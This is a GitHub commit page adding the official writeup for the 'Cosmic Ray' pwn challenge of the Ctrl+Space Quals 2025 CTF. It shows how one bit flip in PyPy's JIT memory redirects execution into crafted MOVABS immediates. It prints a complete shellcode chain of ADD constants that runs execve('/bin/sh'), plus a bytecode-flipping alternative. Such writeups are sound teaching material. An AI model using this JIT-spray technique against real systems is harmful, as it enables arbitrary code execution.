Skip to content

Commit 7318c06

Browse files
committed
feat: Writeup for Cosmic Ray quals challenge
1 parent 9fec17c commit 7318c06

File tree

2 files changed

+350
-0
lines changed

2 files changed

+350
-0
lines changed
841 KB
Loading
Lines changed: 350 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,350 @@
1+
---
2+
title: "Cosmic Ray - Ctrl+Space Quals 2025"
3+
date: "2025-10-02"
4+
description: "The official writeup for the challenge Cosmic Ray from the Ctrl+Space Quals 2025 CTF"
5+
tags: ["pwn", "ctf", "ctrl", "space", "mhackeroni"]
6+
showAuthor: false
7+
---
8+
9+
Author: [mebeim](https://github.com/mebeim) (Marco Bonelli)
10+
11+
Full source code of the challenge is available [here](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/)
12+
13+
> I had written a perfect program, when all of a sudden... a cosmic ray was
14+
> enough to pwn my entire system :(
15+
16+
17+
## Description
18+
19+
*For a TL;DR of the solution, just check the comments in [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py).*
20+
21+
The challenge consists of a simple Python 3 program ([`app.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/src/app.py)) ran
22+
by the [PyPy][pypy] interpreter that implements a CLI to create and invoke
23+
custom Python `lambda` functions. These functions can be created using a limited
24+
set of whitelisted operations, take a single argument and return a single value.
25+
26+
```none
27+
Available commands:
28+
[B]uild a function
29+
[C]all a function
30+
[L]ist functions
31+
[T]rigger a cosmic ray
32+
33+
> B
34+
Name: foo
35+
Input one operation per line, end with "END":
36+
> ADD 10
37+
> MUL 2
38+
> REPEAT 5
39+
> LIST
40+
> END
41+
Function created!
42+
43+
> L
44+
Currently defined functions:
45+
foo = lambda x: list(((((x) + 10) * 2) for _ in range(5)))
46+
47+
> C
48+
Name: foo
49+
Argument: 1
50+
Result: [22, 22, 22, 22, 22]
51+
```
52+
53+
Other than that, the script also offers an interesting functionality (cosmic
54+
ray) that allows the user to flip a bit in certain memory areas:
55+
56+
```py
57+
try:
58+
where = int(input('Where? '), 0)
59+
except ValueError:
60+
raise ValueError('Invalid input') from None
61+
62+
offset = where // 8
63+
bit = where % 8
64+
65+
# ... scan /proc/self/maps and calculate vaddr
66+
67+
from cffi import FFI
68+
FFI().cast("unsigned char *", vaddr)[0] ^= (1 << bit)
69+
```
70+
71+
This bit flip is only allowed in writeable anonymous memory areas, excluding the
72+
process stack, and is also only allowed once due to a global variable that is
73+
set after first usage.
74+
75+
76+
## Goal
77+
78+
The goal is clear: achieve arbitrary code execution to read the contents of the
79+
`/flag` file. The memory areas where the bit flip is allowed are pretty much
80+
limited to a handful of anonymous mappings: the interpreter heap (brk), the
81+
Python heap (where most Python objects live) and a RWX mapping used by PyPy to
82+
JIT compile Python code whenever it deems it necessary. Anything else is
83+
seemingly untouchable (bad permissions and/or non-anonymous).
84+
85+
```none
86+
$ sudo cat /proc/$(pidof pypy3)/maps
87+
5e177bf9f000-5e177bfa0000 r--p 00000000 00:43 21012271 /usr/bin/pypy3.10-c
88+
5e177bfa0000-5e177bfa1000 r-xp 00001000 00:43 21012271 /usr/bin/pypy3.10-c
89+
5e177bfa1000-5e177bfa2000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
90+
5e177bfa2000-5e177bfa3000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
91+
5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c
92+
5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap]
93+
5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap]
94+
7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0
95+
7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0
96+
7a2d7d1f1000-7a2d7e9c3000 rw-p 00000000 00:00 0
97+
...
98+
```
99+
100+
Since the script only allows for one bit flip to happen, a viable solution must
101+
either achieve arbitrary code execution via a single bit flip or use the initial
102+
bit flip to disable the global variable check and allow for more (preferably
103+
unlimited) bit flips.
104+
105+
106+
## Solution
107+
108+
There are two main solution paths, although one of them remains theoretical and
109+
I have not spent too much time investigating its feasibility. It is however
110+
worth mentioning (find it below).
111+
112+
### Altering JITed Code
113+
114+
As you might already know, PyPy3 is known for its ability to Just-In-Time
115+
compile Python code into machine code (in this case, x86-64). This is done only
116+
if deemed necessary by the interpreter, which means only for "hot" loops. For
117+
example, a long enough loop doing calculations or an infinite `while True` loop
118+
are highly likely to be JITed. The JITed code is written to and executed
119+
directly from a RWX memory region. This is a prime target for a "cosmic ray".
120+
121+
We can create a "hot" loop within a `lambda` function with the `REPEAT`
122+
operation, which translates to `((EXPR) for _ in range(N))` where `N` is
123+
controlled and `EXPR` comes from previous operations (also controlled).
124+
125+
A very simple lambda built with `ADD 0x1122334455` + `REPEAT 9999` + `LIST` will
126+
be JITed by PyPy at a deterministic offset into the RWX JIT memory area. What's
127+
more interesting is that a large enough constant (between 5 and 8 bytes) will
128+
most likely get embedded *as is* into JITed code as an immediate for the x86
129+
MOVABS instruction (a.k.a. MOV r64, imm64). We can also notice this
130+
[in the PyPy codebase][pypy-jit-movabs]. This is also useful to find the
131+
address/offset of a specific piece of JITed code from GDB:
132+
133+
```none
134+
$ sudo pwndbg --pid $(pidof pypy3)
135+
pwndbg> search -t qword --trunc-out 73588229205
136+
Searching for an 8-byte integer: b'UD3"\x11\x00\x00\x00'
137+
[anon_7081faf76] 0x7081faf78679 push rbp /* 0x1122334455 */
138+
[anon_7081faf76] 0x7081faf78945 push rbp /* 0x1122334455 */
139+
...
140+
pwndbg> x/10i 0x7081faf78679 - 2
141+
0x7081faf78677: movabs r11,0x1122334455
142+
0x7081faf78681: add rdi,r11
143+
0x7081faf78684: jo 0x7081faf78c17
144+
```
145+
146+
Doing simple mathematical operations with large values gives us a very good
147+
primitive to inject arbitrary bytes into JITed code via MOVABS. Other ways are
148+
definitely possible, but MOVABS gives us a lot of space. In particular, we have
149+
8 controlled immediate bytes ending up in a RWX region. If we can somehow flip
150+
some bit around the JITed code to jump into the immediate, we can use the first
151+
6 to run some arbitrary code, and the last two to perform a short jump into the
152+
immediate of a subsequent MOVABS instruction to continue.
153+
154+
A `lambda` built with a sequence of arithmetical instructions with large
155+
immediates can easily turn into a sequence of MOVABS instructions. For example:
156+
157+
```none
158+
ADD 0x1122334455
159+
ADD 0x2233445566
160+
ADD 0x3344556677
161+
REPEAT 10000
162+
LIST
163+
END
164+
```
165+
166+
Will become something like:
167+
168+
```none
169+
...
170+
movabs r11,0x1122334455
171+
add rdi,r11
172+
jo 0x7bcffd7a0c87
173+
mov QWORD PTR [rbx+0x28],0xe
174+
mov QWORD PTR [rbp+0x158],rdi
175+
movabs r11,0x2233445566
176+
add rdi,r11
177+
jo 0x7bcffd7a0ca3
178+
mov QWORD PTR [rbx+0x28],0x12
179+
mov QWORD PTR [rbp+0x158],rdi
180+
movabs r11,0x3344556677
181+
add rdi,r11
182+
jo 0x7bcffd7a0cbf
183+
...
184+
```
185+
186+
Taking a look at how MOVABS is encoded, we have:
187+
188+
```none
189+
49 bb 55 44 33 22 11 00 00 00 movabs r11, 0x1122334455
190+
```
191+
192+
Flipping bit 3 of the second byte turns the instruction into:
193+
194+
```none
195+
49 b3 55 rex.WB mov r11b, 0x55
196+
44 33 22 xor r12d, DWORD PTR [rdx]
197+
11 00 adc DWORD PTR [rax], eax
198+
...
199+
```
200+
201+
Other variations are also possible, like:
202+
203+
```none
204+
49 9b rex.WB fwait
205+
55 push rbp
206+
44 33 22 xor r12d, DWORD PTR [rdx]
207+
11 00 adc DWORD PTR [rax], eax
208+
...
209+
```
210+
211+
*`fwait`... you really never stop learning new x86 instructions, huh?*
212+
213+
One single bit flip is therefore enough to start executing part of the original
214+
MOVABS immediate we provide as code. We can encode an initial JMP ahead into the
215+
next immediate, perform some instructions, JMP imm8 to the next, and repeat.
216+
This is more than enough to pop a shell.
217+
218+
The only thing we must pay attention to is a small optimization performed by the
219+
PyPy JIT compiler when dealing with consecutive integer values that are "close
220+
enough" to each other (within 32-bit distance). Doing the same as above with
221+
`ADD 0x1122334455` followed by `ADD 0x1122334466` will JIT compile into:
222+
223+
```none
224+
movabs r11,0x1122334455
225+
add rdi,r11
226+
jo 0x7a721ea94c47
227+
mov QWORD PTR [rbx+0x28],0xe
228+
mov QWORD PTR [rbp+0x158],rdi
229+
lea r11,[r11+0x11] <<<<<<
230+
add rdi,r11
231+
jo 0x7a721ea94c63
232+
```
233+
234+
Not a problem if our immediates are "far enough" from each other in value, but
235+
even then, all is fine with a bit of juggling around.
236+
237+
Now it's GG. We can read in more shellcode, run existing code (we can definitely
238+
break ASLR now), or even just directly pop a shell via `execve`. The final
239+
sequence of instructions I used to call
240+
`execve("/bin/sh", {"/bin/sh", NULL}, NULL)` looks like this:
241+
242+
```none
243+
ADD 0x01010101011ceb90 -> jmp short $+0x1e
244+
ADD 0x17eb900068732f68 -> push 0x68732f '/sh\x00'
245+
jmp short $+0x19
246+
ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16
247+
jmp short $+0x19
248+
ADD 0x17eb6e6924048166 -> add word ptr [rsp], 0x6e69 'in'
249+
jmp short $+0x19
250+
ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16
251+
jmp short $+0x19
252+
ADD 0x616161000000ede9 -> jmp $+0xf2
253+
ADD 0x61eb622f24048166 -> add word ptr [rsp], 0x622f '/b'
254+
jmp short $+0x63
255+
ADD 0x61eb90006ae78948 -> mov rdi, rsp rdi = "/bin/sh"
256+
push 0
257+
jmp short $+0x63
258+
ADD 0x61eb9090e6894857 -> push rdi
259+
mov rsi, rsp rsi = {"/bin/sh", NULL}
260+
jmp short $+0x63
261+
ADD 0x61eb3bb0c031d231 -> xor edx, edx rdx = NULL
262+
xor eax, eax
263+
mov al, 0x3b rax = __NR_execve
264+
jmp short $+0x63
265+
ADD 0x61eb90909090050f -> syscall
266+
REPEAT 10000
267+
LIST
268+
```
269+
270+
The first instruction is changed from `movabs r11, 0x01010101011ceb90` to
271+
`rex.WB mov r11b, 0x90; jmp short $+0x1e`, which starts the whole thing. The
272+
only quirk about this solution is that after a few MOVABS instructions PyPy
273+
inserts additional checks in the JITed code, causing the offset between
274+
subsequent MOVABS to change. There is also a big gap in the middle where I have
275+
to waste an entire immediate to fit a JMP off32 (5 bytes). In any case, no big
276+
deal.
277+
278+
### Alternate Solution: Altering Python Bytecode
279+
280+
As we all know Python is an interpreted language with an intermediate bytecode
281+
representation that is executed by the interpreter virtual machine. Instead of
282+
focusing on what happens after the PyPy JIT kicks in, we could also alter the
283+
Python bytecode itself. Assuming that the bytecode for script functions is
284+
stored in one of the memory areas we can modify, and assuming that its offset is
285+
fixed (or at least stable enough), flipping a bit to modify the bytecode can
286+
drastically modify the script's behavior.
287+
288+
There is no obvious way to use a single bit flip to obtain arbitrary [byte]code
289+
execution, let alone re-use some part of existing bytecode to open, read and
290+
print the contents of an arbitrary file. If we want to modify bytecode we will
291+
have to do so to bypass the single cosmic ray limit, and then use more cosmic
292+
rays to edit existing bytecode at will.
293+
294+
If we take a look at the bytecode for the `cosmic_ray()` function using
295+
[`dis.dis()`][py-dis-dis] we can see a few interesting spots where flipping a
296+
bit would result in bypassing the global variable check, allowing infinite
297+
"cosmic rays" to hit. We can also access the raw bytecode as a `bytes` object
298+
via `cosmic_ray.__code__.co_code` to check actual opcodes and arguments.
299+
300+
Some interestig opcodes to consider for the bit flip are right at the start and
301+
towards the end of the function:
302+
303+
```none
304+
0 LOAD_GLOBAL 0 (COSMIC_RAY_HIT)
305+
2 POP_JUMP_IF_FALSE 8 (to 16)
306+
...
307+
324 LOAD_CONST 22 (True)
308+
326 STORE_GLOBAL 0 (COSMIC_RAY_HIT)
309+
...
310+
```
311+
312+
The opcode for `POP_JUMP_IF_FALSE` is 0x72: flipping its LSB turns it into 0x73,
313+
which is `POP_JUMP_IF_TRUE`. This would simply negate the `if` condition and
314+
allow for unlimited cosmic rays after the first call to the function (which sets
315+
`COSMIC_RAY_HIT = True` befor return).
316+
317+
Similarly, changing the argument for `STORE_GLOBAL` to something other than 0
318+
would cause the script to create a new global variable instead of modifying
319+
`COSMIC_RAY_HIT`. Modifying one of the above opcodes into something else may
320+
also work, depending on the specific case.
321+
322+
There are however a couple of problems with this approach:
323+
324+
1. We are working with offsets into memory, and not absolute addresses. While
325+
the memory layout seems pretty stable at first, the `cosmic_ray()` functions
326+
imports the `cffi` module, causing a bunch of mappings to be created and also
327+
moving existing Python objects around. This results in a not-so-predictable
328+
layout after the first invocation. Subsequent invocations to perform more
329+
bit flips would need to take this into account.
330+
2. Depending on which opcode we choose to modify and how, we might end up
331+
crashing the interpreter either via internal check failures or plain and
332+
simple segmentation faults. For example, I have noticed that changing
333+
`STORE_GLOBAL 0` to `STORE_GLOBAL 8` (thus creating `FFI = True` globally)
334+
works on Ubuntu 24 `pypy3`, but crashes with a HLT for Alpine `pypy3` (used
335+
in the challenge container). YMMV.
336+
337+
This is the main reason I did not explore this solution path any further. It
338+
does however still seem within the realm of possibility.
339+
340+
341+
### Complete Exploit
342+
343+
See [`expl.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/expl.py) for the complete exploit. A simplified version is
344+
available at [`checker/__main__.py`](https://github.com/mebeim/ctf-challenges/blob/master/challenges/cosmic-ray/checker/__main__.py) and is intended to be
345+
used as an automated status check.
346+
347+
348+
[pypy]: https://www.pypy.org
349+
[pypy-jit-movabs]: https://github.com/pypy/pypy/blob/76657ba47f6d48c7db77615d3a26bd5029f8b05a/rpython/jit/backend/x86/rx86.py#L886
350+
[py-dis-dis]: https://docs.python.org/3/library/dis.html#dis.dis

0 commit comments

Comments
 (0)